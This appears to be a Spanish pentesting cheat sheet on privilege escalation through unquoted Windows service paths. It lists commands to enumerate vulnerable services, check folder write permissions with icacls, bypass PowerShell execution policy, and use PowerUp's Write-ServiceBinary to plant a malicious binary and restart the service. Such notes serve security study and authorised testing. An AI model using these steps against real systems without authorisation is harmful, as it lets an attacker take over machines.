Rutas de servicio sin comillas (Unquoted Service Paths)
Orden de búsqueda
C:\example.exe
C:\Program Files\example.exe
C:\Program Files\my example\example.exe
C:\Program Files\my example\my example\example.exe
Enumeración de rutas de servicio
# Buscamos servicios que cumplan con esta condición
Get-CimInstance -ClassName win32_service | Select Name,State,PathName
# Comprobar si podemos iniciar/detener el servicio
Start-Service <SERVICE>
Stop-Service <SERVICE>
# Buscar en la ruta donde se encuentra el servicio, directorios en los cuales podemos escribir para poder agregar nuestro binario malicioso
icacls "C:\"
icacls "C:\Program Files"
icacls "C:\Program Files\my example"
# Iniciamos el servicio
Start-Service <SERVICE>
# Otra forma de buscar binarios que cumplan con esta condición es
wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """
Alternativa - PowerUp
powershell -ep bypass
. .\PowerUp.ps1
Get-UnquotedService
Write-ServiceBinary -Name '<SERVICE>' -Path "C:\Program Files\my binary\binary.exe"
Start-Service <SERVICE>